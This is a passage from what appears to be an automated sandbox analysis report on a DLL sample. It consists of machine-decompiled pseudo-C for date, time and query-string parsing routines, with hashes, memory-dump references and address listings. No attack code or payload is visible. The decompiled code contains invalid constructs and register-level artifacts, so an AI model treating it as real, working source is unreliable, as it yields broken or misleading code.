                                                      																			goto L8;
                                                      																		} else {
                                                      																			goto L23;
                                                      																		}
                                                      																	} else {
                                                      																		_t131 =  *_t136;
                                                      																		goto L17;
                                                      																	}
                                                      																}
                                                      															}
                                                      														}
                                                      													}
                                                      												}
                                                      											}
                                                      										}
                                                      									}
                                                      									goto L35;
                                                      								}
                                                      							}
                                                      						}
                                                      					}
                                                      				}
                                                      				L35:
                                                      			}






































                                                      APIs
                                                      Strings
                                                      • Invalid separator(s) found., xrefs: 1002E560
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_bprint_escape$mv_bprint_append_datamv_bprint_finalizemv_bprint_initmv_freepmv_logmv_opt_getmv_opt_is_set_to_default
                                                      • String ID: Invalid separator(s) found.
                                                      • API String ID: 350117393-2087347751
                                                      • Opcode ID: ced0a989e3125253dd28f18aa86190e22e38fd0a67e20fb3db2e57ccf5a3ca8b
                                                      • Instruction ID: be32556558566da91918c2a680401ca33f3fbc8414c6347af4aa08559a4ec22a
                                                      • Opcode Fuzzy Hash: ced0a989e3125253dd28f18aa86190e22e38fd0a67e20fb3db2e57ccf5a3ca8b
                                                      • Instruction Fuzzy Hash: 627144B5A497818FD750DF28D48069BBBE5FF89384F85892EE998C3301E735ED048B42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 38%
                                                      			E1002F204(void* __ebx, void* __edx, void* __eflags) {
                                                      				signed int _t204;
                                                      				void* _t205;
                                                      				signed int _t210;
                                                      				signed int* _t217;
                                                      				void* _t220;
                                                      				void* _t225;
                                                      				signed int _t226;
                                                      				signed int _t232;
                                                      				void* _t239;
                                                      				signed int _t242;
                                                      				signed int _t245;
                                                      				signed int _t246;
                                                      				signed int _t248;
                                                      				void* _t250;
                                                      
                                                      				__eax = E1004B090(__ebx, __eflags);
                                                      				__esp[1] = __edx;
                                                      				__esi = __eax;
                                                      				__eax = 0xf4240;
                                                      				__esp[2] = 0xf4240;
                                                      				__eax = 0;
                                                      				__edi = __edx;
                                                      				__esp[3] = 0;
                                                      				 *__esp = __esi;
                                                      				__eax = L1008EDE0();
                                                      				 *__esp = __ebp;
                                                      				__esp[0xe] = __eax;
                                                      				__eax = 0x100b4c2e;
                                                      				__esp[1] = 0x100b4c2e;
                                                      				__esp[0xf] = __edx;
                                                      				__eax = L10006B30();
                                                      				__eflags = __eax;
                                                      				if(__eax == 0) {
                                                      					L39:
                                                      					_t217 =  *(_t250 + 0xd0);
                                                      					 *_t217 = _t246;
                                                      					_t217[1] = _t242;
                                                      					_t205 = 0;
                                                      					goto L40;
                                                      				} else {
                                                      					__esp[2] = __ebx;
                                                      					__eax = "%Y - %m - %d";
                                                      					__esp[1] = "%Y - %m - %d";
                                                      					 *__esp = __ebp;
                                                      					__eax = L1002EC70();
                                                      					__eflags = __eax;
                                                      					if(__eax != 0) {
                                                      						__edi = 0;
                                                      						__ebp = __eax;
                                                      						__esp[0xb] = 0;
                                                      					} else {
                                                      						 *__esp = __ebp;
                                                      						__eax = "%Y%m%d";
                                                      						__esp[2] = __ebx;
                                                      						__esp[1] = "%Y%m%d";
                                                      						__eax = L1002EC70();
                                                      						__eflags = __eax - 1;
                                                      						asm("sbb edi, edi");
                                                      						__edi = __edi & 0x00000001;
                                                      						__eflags = __eax;
                                                      						__esp[0xb] = __edi;
                                                      						__ebp =  !=  ? __eax : __ebp;
                                                      					}
                                                      					__eax =  *__ebp & 0x000000ff;
                                                      					__eflags = (__al & 0x000000df) - 0x54;
                                                      					if((__al & 0x000000df) == 0x54) {
                                                      						__ebp =  &(__ebp[1]);
                                                      					} else {
                                                      						while(1) {
                                                      							__eflags = __al - 9 - 4;
                                                      							if(__al - 9 <= 4) {
                                                      								goto L41;
                                                      							}
                                                      							__eflags = __al - 0x20;
                                                      							if(__al == 0x20) {
                                                      								goto L41;
                                                      							}
                                                      							goto L12;
                                                      							L41:
                                                      							__ebp =  &(__ebp[1]);
                                                      							__eax =  *__ebp & 0x000000ff;
                                                      						}
                                                      					}
                                                      					L12:
                                                      					__esp[2] = __ebx;
                                                      					__esi = "%H:%M:%S";
                                                      					__esp[1] = "%H:%M:%S";
                                                      					 *__esp = __ebp;
                                                      					__eax = L1002EC70();
                                                      					__eflags = __eax;
                                                      					__edx = __eax;
                                                      					if(__eax != 0) {
                                                      						L14:
                                                      						__eax =  *__edx & 0x000000ff;
                                                      						__ecx = 0;
                                                      						__esp[9] = 0;
                                                      						__eflags = __al - 0x2e;
                                                      						if(__al == 0x2e) {
                                                      							__esp[0xa] = 0;
                                                      							__ecx = __edx;
                                                      							__edx = __ecx[1];
                                                      							__eax = __edx;
                                                      							__edx = __edx - 0x30;
                                                      							__eflags = __edx - 9;
                                                      							if(__edx > 9) {
                                                      								_t171 =  &(__ecx[1]); // 0x1
                                                      								__edx = _t171;
                                                      								__ebp = 0;
                                                      							} else {
                                                      								__ebp = __edx * 0x186a0;
                                                      								__edx = __ecx[2];
                                                      								__eax = __edx;
                                                      								__edx = __edx - 0x30;
                                                      								__eflags = __edx - 9;
                                                      								if(__edx > 9) {
                                                      									_t172 =  &(__ecx[2]); // 0x2
                                                      									__edx = _t172;
                                                      								} else {
                                                      									__ebp =  &(__ebp[__edx]);
                                                      									__edx = __ecx[3];
                                                      									__eax = __edx;
                                                      									__edx = __edx - 0x30;
                                                      									__eflags = __edx - 9;
                                                      									if(__edx > 9) {
                                                      										_t173 =  &(__ecx[3]); // 0x3
                                                      										__edx = _t173;
                                                      									} else {
                                                      										__ebp =  &(__ebp[__edx]);
                                                      										__edx = __ecx[4];
                                                      										__eax = __edx;
                                                      										__edx = __edx - 0x30;
                                                      										__eflags = __edx - 9;
                                                      										if(__edx > 9) {
                                                      											_t174 =  &(__ecx[4]); // 0x4
                                                      											__edx = _t174;
                                                      										} else {
                                                      											__eax = __edx + __edx * 4;
                                                      											__edx = __ecx[5];
                                                      											__ebp = __ebp + __eax * 4;
                                                      											__eax = __edx;
                                                      											__edx = __edx - 0x30;
                                                      											__eflags = __edx - 9;
                                                      											if(__edx > 9) {
                                                      												_t175 =  &(__ecx[5]); // 0x5
                                                      												__edx = _t175;
                                                      											} else {
                                                      												__eax = __edx + __edx * 4;
                                                      												__edx = __ecx[6];
                                                      												__ebp = __ebp + __eax * 2;
                                                      												__eax = __edx;
                                                      												__edx = __edx - 0x30;
                                                      												__eflags = __edx - 9;
                                                      												if(__edx > 9) {
                                                      													_t176 =  &(__ecx[6]); // 0x6
                                                      													__edx = _t176;
                                                      												} else {
                                                      													__ebp =  &(__ebp[__edx]);
                                                      													_t35 =  &(__ecx[7]); // 0x7
                                                      													__edx = _t35;
                                                      													__ecx = __ecx[7];
                                                      													__eax = __ecx;
                                                      													__ecx = __ecx - 0x30;
                                                      													__eflags = __ecx - 9;
                                                      													while(__ecx <= 9) {
                                                      														__ecx =  *(__edx + 1);
                                                      														__edx = __edx + 1;
                                                      														__eax = __ecx;
                                                      														__ecx = __ecx - 0x30;
                                                      														__eflags = __ecx - 9;
                                                      													}
                                                      												}
                                                      											}
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      							__esi = __esp[0x36];
                                                      							__eflags = __esp[0x36];
                                                      							if(__esp[0x36] != 0) {
                                                      								__ecx = __edx;
                                                      								if(_t204 == 0x6d) {
                                                      									__eflags =  *(_t225 + 1) - 0x73;
                                                      									if( *(_t225 + 1) != 0x73) {
                                                      										goto L63;
                                                      									} else {
                                                      										_t239 = 0x5a1cac09;
                                                      										_t204 =  *(_t225 + 2) & 0x000000ff;
                                                      										_t220 = 0xa5e353f7;
                                                      										_t226 = 0x3e8;
                                                      										_t248 = 0x10624dd3 * _t248 >> 0x20 >> 6;
                                                      										goto L31;
                                                      									}
                                                      								} else {
                                                      									if(_t204 == 0x75) {
                                                      										__eflags =  *(_t225 + 1) - 0x73;
                                                      										if( *(_t225 + 1) == 0x73) {
                                                      											__eflags =  *(_t225 + 2);
                                                      											if( *(_t225 + 2) != 0) {
                                                      												goto L63;
                                                      											} else {
                                                      												_t245 = 0;
                                                      												_t242 = 0;
                                                      												goto L35;
                                                      											}
                                                      										} else {
                                                      											goto L63;
                                                      										}
                                                      									} else {
                                                      										if(_t204 == 0x73) {
                                                      											_t204 =  *(_t225 + 1) & 0x000000ff;
                                                      										}
                                                      										goto L30;
                                                      									}
                                                      								}
                                                      								goto L40;
                                                      							} else {
                                                      								goto L26;
                                                      							}
                                                      						} else {
                                                      							__esp[0xa] = 0;
                                                      							__ebp = 0;
                                                      							L26:
                                                      							__al = __al & 0x000000df;
                                                      							__eflags = __al - 0x5a;
                                                      							__ecx = __ecx & 0xffffff00 | __al == 0x0000005a;
                                                      							__edi = __cl & 0x000000ff;
                                                      							__ecx = __esp[0xb];
                                                      							__esi = __edx + __edi;
                                                      							__edi = __edi | __esp[0xb];
                                                      							__eflags = __edi;
                                                      							if(__edi != 0) {
                                                      								__edx = __esp[0xb];
                                                      								__eflags = __esp[0xb];
                                                      								if(__esp[0xb] == 0) {
                                                      									L50:
                                                      									__eax = 0;
                                                      									__esp[6] = 0;
                                                      									__eax = 0;
                                                      									__eflags = 0;
                                                      									__esp[7] = 0;
                                                      									goto L51;
                                                      								} else {
                                                      									__eflags = __al - 0x5a;
                                                      									__eax =  &(__esp[0xe]);
                                                      									__esp[1] =  &(__esp[0xe]);
                                                      									__eax =  &(__esp[0x1a]);
                                                      									 *__esp =  &(__esp[0x1a]);
                                                      									if(__al != 0x5a) {
                                                      										__eax =  *0x100aa0c4();
                                                      										__eflags = __eax;
                                                      										if(__eax != 0) {
                                                      											goto L86;
                                                      										} else {
                                                      											__eax = 0;
                                                      											__eflags = 0;
                                                      											do {
                                                      												__edx =  *(__esp + __eax + 0x68);
                                                      												 *(__esp + __eax + 0x8c) =  *(__esp + __eax + 0x68);
                                                      												__eax = __eax + 4;
                                                      												__eflags = __eax - 0x24;
                                                      											} while (__eax < 0x24);
                                                      											__eax = __esp[0x11];
                                                      											__esp[0x23] = __esp[0x11];
                                                      											__eax = __esp[0x12];
                                                      											__esp[0x24] = __esp[0x12];
                                                      											__eax = __esp[0x13];
                                                      											__esp[0x25] = __esp[0x13];
                                                      											__eax = 0;
                                                      											__eflags = 0;
                                                      											do {
                                                      												__edx =  *(__esp + __eax + 0x8c);
                                                      												 *(__esp + __eax + 0x44) = __edx;
                                                      												__eax = __eax + 4;
                                                      												__eflags = __eax - 0x24;
                                                      											} while (__eax < 0x24);
                                                      											goto L28;
                                                      										}
                                                      									} else {
                                                      										__eax =  *0x100aa0c8();
                                                      										__eflags = __eax;
                                                      										if(__eax != 0) {
                                                      											L86:
                                                      											__esi = 0;
                                                      											__ecx = 9;
                                                      											__edi =  &(__esp[0x23]);
                                                      											__eax = memcpy( &(__esp[0x23]), 0, 9 << 2);
                                                      											__edi = 0 + __ecx;
                                                      											__edi =  &(__ecx[0 + __ecx]);
                                                      											__ecx = 0;
                                                      											asm("ud2");
                                                      											_push(__ebp);
                                                      											_push(__edi);
                                                      											_push(0);
                                                      											_push(__ebx);
                                                      											__esp = __esp - 0xac;
                                                      											__ecx = __esp[0x33];
                                                      											__edi = __esp[0x30];
                                                      											__eax =  *__ecx & 0x000000ff;
                                                      											__eflags = __al - 0x3f;
                                                      											if(__al == 0x3f) {
                                                      												__eax = __ecx[1] & 0x000000ff;
                                                      												__ecx =  &(__ecx[1]);
                                                      												__eflags = __ecx;
                                                      											}
                                                      											__esi = __esp[0x31];
                                                      											__ebx =  &(__esp[8]);
                                                      											__esi = __esp[0x31] - 1;
                                                      											__eflags = __al;
                                                      											__esp[7] = __esp[0x31] - 1;
                                                      											__esi = __esp[0x32];
                                                      											if(__al == 0) {
                                                      												L100:
                                                      												__edx = __ebx;
                                                      												__eflags = __al - 0x3d;
                                                      												 *__ebx = 0;
                                                      												__ebp = __ecx;
                                                      												__edx = __edi;
                                                      												if(__al == 0x3d) {
                                                      													goto L102;
                                                      												}
                                                      											} else {
                                                      												L90:
                                                      												__eflags = __al - 0x3d;
                                                      												__edx = __ebx;
                                                      												if(__al == 0x3d) {
                                                      													goto L100;
                                                      												} else {
                                                      													while(1) {
                                                      														__eflags = __al - 0x26;
                                                      														if(__al == 0x26) {
                                                      															break;
                                                      														} else {
                                                      															goto L93;
                                                      														}
                                                      														while(1) {
                                                      															L93:
                                                      															__edx = __edx - __ebx;
                                                      															__eflags = __edx - __ebx - 0x7e;
                                                      															if(__edx - __ebx <= 0x7e) {
                                                      																break;
                                                      															}
                                                      															__eax = __ecx[1] & 0x000000ff;
                                                      															__ecx =  &(__ecx[1]);
                                                      															__eflags = __al;
                                                      															if(__al == 0) {
                                                      																L96:
                                                      																 *__edx = 0;
                                                      																__eflags = __al - 0x3d;
                                                      																__ebp = __ecx;
                                                      																__edx = __edi;
                                                      																if(__al == 0x3d) {
                                                      																	L102:
                                                      																	__eax =  &(__ecx[1]);
                                                      																	__ecx = __ecx[1] & 0x000000ff;
                                                      																	__eflags = __cl;
                                                      																	if(__cl == 0) {
                                                      																		L124:
                                                      																		__edx = __edi;
                                                      																		__ebp = __eax;
                                                      																	} else {
                                                      																		__eflags = __cl - 0x26;
                                                      																		if(__cl == 0x26) {
                                                      																			goto L124;
                                                      																		} else {
                                                      																			__esp[0x32] = __esi;
                                                      																			while(1) {
                                                      																				__esi = __esp[7];
                                                      																				__edx = __edx - __edi;
                                                      																				__eflags = __edx - __edi - __esp[7];
                                                      																				if(__edx - __edi >= __esp[7]) {
                                                      																					break;
                                                      																				}
                                                      																				__eflags = __cl - 0x2b;
                                                      																				if(__cl == 0x2b) {
                                                      																					__cl = 0x20;
                                                      																				}
                                                      																				 *__edx = __cl;
                                                      																				__ebp = __edx + 1;
                                                      																				__eax = __eax + 1;
                                                      																				__ecx =  *__eax & 0x000000ff;
                                                      																				__eflags = __cl;
                                                      																				if(__cl == 0) {
                                                      																					L123:
                                                      																					__edx = __ebp;
                                                      																					__esi = __esp[0x32];
                                                      																					__ebp = __eax;
                                                      																				} else {
                                                      																					__eflags = __cl - 0x26;
                                                      																					if(__cl == 0x26) {
                                                      																						goto L123;
                                                      																					} else {
                                                      																						__edx = __ebp;
                                                      																						continue;
                                                      																					}
                                                      																				}
                                                      																				goto L97;
                                                      																			}
                                                      																			__ebp = __eax + 1;
                                                      																			__eax =  *(__eax + 1) & 0x000000ff;
                                                      																			__esi = __esp[0x32];
                                                      																			__eflags = __al - 0x26;
                                                      																			if(__al != 0x26) {
                                                      																				__eflags = __al;
                                                      																				if(__al != 0) {
                                                      																					while(1) {
                                                      																						__eax = __ebp[1] & 0x000000ff;
                                                      																						__ebp =  &(__ebp[1]);
                                                      																						__eflags = __al;
                                                      																						if(__al == 0) {
                                                      																							break;
                                                      																						}
                                                      																						__eflags = __al - 0x26;
                                                      																						if(__al != 0x26) {
                                                      																							continue;
                                                      																						}
                                                      																						goto L97;
                                                      																					}
                                                      																				} else {
                                                      																				}
                                                      																			}
                                                      																		}
                                                      																	}
                                                      																}
                                                      															} else {
                                                      																__eflags = __al - 0x3d;
                                                      																if(__al == 0x3d) {
                                                      																	goto L96;
                                                      																} else {
                                                      																	__eflags = __al - 0x26;
                                                      																	if(__al != 0x26) {
                                                      																		continue;
                                                      																	} else {
                                                      																		goto L115;
                                                      																	}
                                                      																}
                                                      															}
                                                      															goto L97;
                                                      														}
                                                      														 *__edx = __al;
                                                      														__eax = __ecx[1] & 0x000000ff;
                                                      														__ecx =  &(__ecx[1]);
                                                      														__ebp = __edx + 1;
                                                      														__edx = __edx + 1;
                                                      														__eflags = __al - 0x3d;
                                                      														if(__al == 0x3d) {
                                                      															goto L96;
                                                      														} else {
                                                      															__eflags = __al;
                                                      															if(__al != 0) {
                                                      																continue;
                                                      															} else {
                                                      																goto L96;
                                                      															}
                                                      														}
                                                      														goto L97;
                                                      													}
                                                      													L115:
                                                      													 *__edx = 0;
                                                      													__ebp = __ecx;
                                                      													__edx = __edi;
                                                      												}
                                                      											}
                                                      											L97:
                                                      											 *__edx = 0;
                                                      											__eax = strcmp(__ebx, __esi);
                                                      											__eflags = __eax;
                                                      											if(__eax == 0) {
                                                      												__esp =  &(__esp[0x2b]);
                                                      												__eax = 1;
                                                      												_pop(__ebx);
                                                      												_pop(__esi);
                                                      												_pop(__edi);
                                                      												_pop(__ebp);
                                                      												return 1;
                                                      											} else {
                                                      												__eflags =  *__ebp - 0x26;
                                                      												if( *__ebp != 0x26) {
                                                      													__esp =  &(__esp[0x2b]);
                                                      													__eax = 0;
                                                      													__eflags = 0;
                                                      													_pop(__ebx);
                                                      													_pop(__esi);
                                                      													_pop(__edi);
                                                      													_pop(__ebp);
                                                      													return 0;
                                                      												} else {
                                                      													__eax = __ebp[1] & 0x000000ff;
                                                      													__ecx =  &(__ebp[1]);
                                                      													__eflags = __al;
                                                      													if(__al != 0) {
                                                      														goto L90;
                                                      													} else {
                                                      														goto L100;
                                                      													}
                                                      													goto L97;
                                                      												}
                                                      											}
                                                      										} else {
                                                      											__eax = 0;
                                                      											__eflags = 0;
                                                      											do {
                                                      												__edx =  *(__esp + __eax + 0x68);
                                                      												 *(__esp + __eax + 0x8c) =  *(__esp + __eax + 0x68);
                                                      												__eax = __eax + 4;
                                                      												__eflags = __eax - 0x24;
                                                      											} while (__eax < 0x24);
                                                      											__eax = __esp[0x11];
                                                      											__esp[0x23] = __esp[0x11];
                                                      											__eax = __esp[0x12];
                                                      											__esp[0x24] = __esp[0x12];
                                                      											__eax = __esp[0x13];
                                                      											__esp[0x25] = __esp[0x13];
                                                      											__eax = 0;
                                                      											__eflags = 0;
                                                      											do {
                                                      												__edx =  *(__esp + __eax + 0x8c);
                                                      												 *(__esp + __eax + 0x44) =  *(__esp + __eax + 0x8c);
                                                      												__eax = __eax + 4;
                                                      												__eflags = __eax - 0x24;
                                                      											} while (__eax < 0x24);
                                                      											goto L50;
                                                      										}
                                                      									}
                                                      								}
                                                      							} else {
                                                      								__eax =  *__esi & 0x000000ff;
                                                      								__al = __al - 0x2b;
                                                      								__eflags = __al & 0x000000fd;
                                                      								if((__al & 0x000000fd) == 0) {
                                                      									__ebx =  &(__esp[0x23]);
                                                      									__edx = 0;
                                                      									__eax = 0;
                                                      									__eflags = 0;
                                                      									do {
                                                      										 *(__esp + __eax + 0x8c) = 0;
                                                      										 *((intOrPtr*)(__esp + __eax + 0x90)) = 0;
                                                      										__eax = __eax + 8;
                                                      										__eflags = __eax - 0x20;
                                                      									} while (__eax < 0x20);
                                                      									__ebx[__eax] = 0;
                                                      									__eax = 0;
                                                      									__edx = 0x100b4c28;
                                                      									__eflags =  *__esi - 0x2b;
                                                      									__eax = 0 |  *__esi != 0x0000002b;
                                                      									__esi =  &(__esi[1]);
                                                      									__eflags = __esi;
                                                      									__esp[6] = __eax;
                                                      									while(1) {
                                                      										__esp[2] = __ebx;
                                                      										__esp[1] = __edx;
                                                      										 *__esp = __esi;
                                                      										__eax = L1002EC70();
                                                      										__eflags = __eax;
                                                      										if(__eax != 0) {
                                                      											break;
                                                      										}
                                                      										__edi = __edi + 1;
                                                      										__eflags = __edi - 3;
                                                      										if(__edi == 3) {
                                                      											goto L63;
                                                      										} else {
                                                      											__edx =  *(0x100b4c64 + __edi * 4);
                                                      											continue;
                                                      										}
                                                      										goto L40;
                                                      									}
                                                      									__ecx = __esp[0x25];
                                                      									__esi = __eax;
                                                      									__eax = __esp[6];
                                                      									__edx = (__ecx << 4) - __ecx;
                                                      									__ecx = __esp[0x24];
                                                      									__edx = __esp[0x24] + __edx * 4;
                                                      									__edx = __edx * __esp[6];
                                                      									__edx = __edx << 4;
                                                      									__eax = (__edx << 4) - __edx;
                                                      									__eax = (__edx << 4) - __edx << 2;
                                                      									__esp[6] = __eax;
                                                      									__esp[7] = __eax;
                                                      									L51:
                                                      									__edx = __esp[0x15];
                                                      									__eax = 0;
                                                      									__esp[0x19] = 0;
                                                      									__ecx = __esp[0x16];
                                                      									__edi = __esp[0x14];
                                                      									__eax = __edx + 1;
                                                      									__eflags = __eax - 2;
                                                      									if(__eax <= 2) {
                                                      										__eax = __edx + 0xd;
                                                      										__ecx =  &(__ecx[0x76b]);
                                                      									} else {
                                                      										__ecx =  &(__ecx[0x76c]);
                                                      										__eflags = __ecx;
                                                      									}
                                                      									__eax = __eax + __eax * 8;
                                                      									__edx = __eax;
                                                      									__edx = __eax << 4;
                                                      									__ebx = __eax + (__eax << 4) - 0x1c9;
                                                      									__eax = 0x66666667;
                                                      									__edx = 0x66666667 * __ebx >> 0x20;
                                                      									0x66666667 * __ebx = __ebx;
                                                      									__eax = __ebx >> 0x1f;
                                                      									__edx = 0x66666667 * __ebx >> 0x20 >> 1;
                                                      									__edx = (0x66666667 * __ebx >> 0x20 >> 1) - (__ebx >> 0x1f);
                                                      									__eax = __ecx + __ecx * 8;
                                                      									__eax = __ecx + (__ecx + __ecx * 8) * 8;
                                                      									__ebx = __edx + __edi;
                                                      									__ebx =  &((__edx + __edi)[__eax]);
                                                      									__eflags = __ecx;
                                                      									 &(__ecx[3]) =  >=  ? __ecx :  &(__ecx[3]);
                                                      									__eax = ( >=  ? __ecx :  &(__ecx[3])) >> 2;
                                                      									__ebx =  &(__ebx[( >=  ? __ecx :  &(__ecx[3])) >> 2]);
                                                      									__eax = 0x51eb851f;
                                                      									__edx = 0x51eb851f * __ecx >> 0x20;
                                                      									__eax = 0x51eb851f * __ecx;
                                                      									__ecx = __ecx >> 0x1f;
                                                      									__edi = __ecx;
                                                      									__eax = __edx;
                                                      									__eax = __edx >> 5;
                                                      									__edx = __edx >> 7;
                                                      									__edi = __ecx - __eax;
                                                      									__edi =  &(__ebx[__ecx - __eax]);
                                                      									__ebx = __esp[0x12];
                                                      									__eax = __edi + __edx - 0xafa6d;
                                                      									__edx = 0x15180;
                                                      									__edi = __esp[0x13] * 0xe10;
                                                      									__edx = __eax * 0x15180 >> 0x20;
                                                      									__eax = __eax * 0x15180;
                                                      									__ecx = (__ebx << 4) - __ebx;
                                                      									__ecx = __esp[0x13] * 0xe10 + ((__ebx << 4) - __ebx) * 4;
                                                      									__edi = __esp[0x11];
                                                      									__ecx =  &((__esp[0x13] * 0xe10 + ((__ebx << 4) - __ebx) * 4)[__esp[0x11]]);
                                                      									__ebx = __ecx;
                                                      									__ebx = __ecx >> 0x1f;
                                                      									__ecx =  &(__ecx[__eax]);
                                                      									asm("adc ebx, edx");
                                                      									__ecx =  &(__ecx[__esp[6]]);
                                                      									asm("adc ebx, [esp+0x1c]");
                                                      									__esp[6] = __ecx;
                                                      									__esp[7] = __ebx;
                                                      									goto L29;
                                                      								} else {
                                                      									L28:
                                                      									 *__esp = __ebx;
                                                      									__ecx = 0xffffffff;
                                                      									__esp[0x19] = 0xffffffff;
                                                      									__imp___mktime64();
                                                      									__esp[6] = __eax;
                                                      									__esp[7] = __edx;
                                                      									L29:
                                                      									__eax =  *__esi & 0x000000ff;
                                                      									L30:
                                                      									_t239 = 0x842fa50a;
                                                      									_t220 = 0x7bd05af6;
                                                      									_t226 = 0xf4240;
                                                      									L31:
                                                      									if(_t204 != 0) {
                                                      										goto L63;
                                                      									} else {
                                                      										asm("sbb edx, eax");
                                                      										if(_t220 <  *(_t250 + 0x18)) {
                                                      											L76:
                                                      											_t205 = 0xffffffde;
                                                      										} else {
                                                      											_t210 =  *(_t250 + 0x18);
                                                      											_t232 =  *(_t250 + 0x1c);
                                                      											asm("sbb edi, esi");
                                                      											if(_t210 < _t239) {
                                                      												goto L76;
                                                      											} else {
                                                      												_t245 = _t248;
                                                      												_t242 = _t248 >> 0x1f;
                                                      												 *(_t250 + 0x1c) = _t210 * _t226 >> 0x20;
                                                      												 *(_t250 + 0x1c) =  *(_t250 + 0x1c) + _t232 * _t226;
                                                      												 *(_t250 + 0x18) = _t210 * _t226;
                                                      												asm("sbb edx, edi");
                                                      												asm("sbb eax, ebx");
                                                      												if(0xffffffff - _t248 <  *(_t250 + 0x18)) {
                                                      													goto L76;
                                                      												} else {
                                                      													L35:
                                                      													_t246 = _t245 +  *(_t250 + 0x18);
                                                      													asm("adc edi, [esp+0x1c]");
                                                      													if((_t246 | _t242 + 0x80000000) != 0 ||  *((char*)(_t250 + 0x2b)) == 0) {
                                                      														if( *((intOrPtr*)(_t250 + 0x24)) != 0) {
                                                      															_t246 =  ~_t246;
                                                      															asm("adc edi, 0x0");
                                                      															_t242 =  ~_t242;
                                                      														}
                                                      														goto L39;
                                                      													} else {
                                                      														goto L76;
                                                      													}
                                                      												}
                                                      											}
                                                      										}
                                                      									}
                                                      								}
                                                      								goto L40;
                                                      							}
                                                      						}
                                                      					} else {
                                                      						__esp[2] = __ebx;
                                                      						__ecx = "%H%M%S";
                                                      						__esp[1] = "%H%M%S";
                                                      						 *__esp = __ebp;
                                                      						__eax = L1002EC70();
                                                      						__eflags = __eax;
                                                      						__edx = __eax;
                                                      						if(__eax == 0) {
                                                      							L63:
                                                      							_t205 = 0xffffffea;
                                                      							L40:
                                                      							return _t205;
                                                      						} else {
                                                      							goto L14;
                                                      						}
                                                      					}
                                                      				}
                                                      			}

















                                                      0x1002f942
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x1002f948
                                                      0x1002f948
                                                      0x1002f94a
                                                      0x1002f94c
                                                      0x1002f94f
                                                      0x00000000
                                                      0x00000000
                                                      0x1002fa10
                                                      0x1002fa14
                                                      0x1002fa15
                                                      0x1002fa17
                                                      0x1002f969
                                                      0x1002f969
                                                      0x1002f96c
                                                      0x1002f96e
                                                      0x1002f970
                                                      0x1002f972
                                                      0x1002f9b0
                                                      0x1002f9b0
                                                      0x1002f9b3
                                                      0x1002f9b7
                                                      0x1002f9b9
                                                      0x1002fa8d
                                                      0x1002fa8d
                                                      0x1002fa8f
                                                      0x1002f9bf
                                                      0x1002f9bf
                                                      0x1002f9c2
                                                      0x00000000
                                                      0x1002f9c8
                                                      0x1002f9c8
                                                      0x1002f9cf
                                                      0x1002f9cf
                                                      0x1002f9d5
                                                      0x1002f9d7
                                                      0x1002f9d9
                                                      0x00000000
                                                      0x00000000
                                                      0x1002fa40
                                                      0x1002fa43
                                                      0x1002fa45
                                                      0x1002fa45
                                                      0x1002fa47
                                                      0x1002fa49
                                                      0x1002fa4c
                                                      0x1002fa4d
                                                      0x1002fa50
                                                      0x1002fa52
                                                      0x1002fa7d
                                                      0x1002fa7d
                                                      0x1002fa7f
                                                      0x1002fa86
                                                      0x1002fa54
                                                      0x1002fa54
                                                      0x1002fa57
                                                      0x00000000
                                                      0x1002fa59
                                                      0x1002fa59
                                                      0x00000000
                                                      0x1002fa59
                                                      0x1002fa57
                                                      0x00000000
                                                      0x1002fa52
                                                      0x1002f9db
                                                      0x1002f9de
                                                      0x1002f9e2
                                                      0x1002f9e9
                                                      0x1002f9eb
                                                      0x1002f9ed
                                                      0x1002f9ef
                                                      0x1002fa00
                                                      0x1002fa00
                                                      0x1002fa04
                                                      0x1002fa05
                                                      0x1002fa07
                                                      0x00000000
                                                      0x00000000
                                                      0x1002f9f8
                                                      0x1002f9fa
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x1002f9fa
                                                      0x00000000
                                                      0x1002f9f1
                                                      0x1002f9ef
                                                      0x1002f9eb
                                                      0x1002f9c2
                                                      0x1002f9b9
                                                      0x1002fa1d
                                                      0x1002fa1d
                                                      0x1002fa20
                                                      0x00000000
                                                      0x1002fa26
                                                      0x1002fa26
                                                      0x1002fa28
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x1002fa28
                                                      0x1002fa20
                                                      0x00000000
                                                      0x1002fa17
                                                      0x1002f955
                                                      0x1002f957
                                                      0x1002f95b
                                                      0x1002f95c
                                                      0x1002f95f
                                                      0x1002f961
                                                      0x1002f963
                                                      0x00000000
                                                      0x1002f965
                                                      0x1002f965
                                                      0x1002f967
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x1002f967
                                                      0x00000000
                                                      0x1002f963
                                                      0x1002fa2e
                                                      0x1002fa2e
                                                      0x1002fa31
                                                      0x1002fa33
                                                      0x1002fa33
                                                      0x1002f934
                                                      0x1002f974
                                                      0x1002f974
                                                      0x1002f97e
                                                      0x1002f983
                                                      0x1002f985
                                                      0x1002fa60
                                                      0x1002fa66
                                                      0x1002fa6b
                                                      0x1002fa6c
                                                      0x1002fa6d
                                                      0x1002fa6e
                                                      0x1002fa6f
                                                      0x1002f98b
                                                      0x1002f98b
                                                      0x1002f98f
                                                      0x1002fa70
                                                      0x1002fa76
                                                      0x1002fa76
                                                      0x1002fa78
                                                      0x1002fa79
                                                      0x1002fa7a
                                                      0x1002fa7b
